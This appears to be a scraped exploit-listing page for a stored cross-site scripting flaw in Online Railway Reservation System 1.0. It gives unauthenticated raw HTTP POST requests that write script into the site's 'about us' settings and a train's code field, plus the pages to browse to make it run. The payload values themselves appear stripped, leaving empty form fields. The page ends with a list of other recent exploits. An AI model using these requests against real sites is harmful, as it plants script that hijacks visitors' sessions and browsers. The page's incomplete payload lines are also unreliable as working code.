Online railway reservation system 1.0 multiple stored cross site scripting (xss) (unauthenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2022-01-10 | Type : webapps | Platform : php
This exploit / vulnerability Online railway reservation system 1.0 multiple stored cross site scripting (xss) (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

#Exploit Title: Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage:
#Software Link:
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0

To Store XSS (about_us)
POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447
Content-Length: 159

Content-Disposition: form-data; name="content[about_us]"


To Trigger Stored XSS (about_us)
Browse to http://<ip>/orrs/?page=about

To Store XSS (train code)
POST /orrs/classes/Master.php?f=save_train HTTP/1.1
Host: localhost
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------271324269624375374252271437649
Content-Length: 254

Content-Disposition: form-data; name="id"

Content-Disposition: form-data; name="code"


To Trigger XSS (train code)
Browse to http://localhost/orrs/?page=schedules

Online railway reservation system 1.0 multiple stored cross site scripting (xss) (unauthenticated)

Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php

▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple

▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php

Online railway reservation system 1.0 multiple stored cross site scripting (xss) (unauthenticated) Vulnerability / Exploit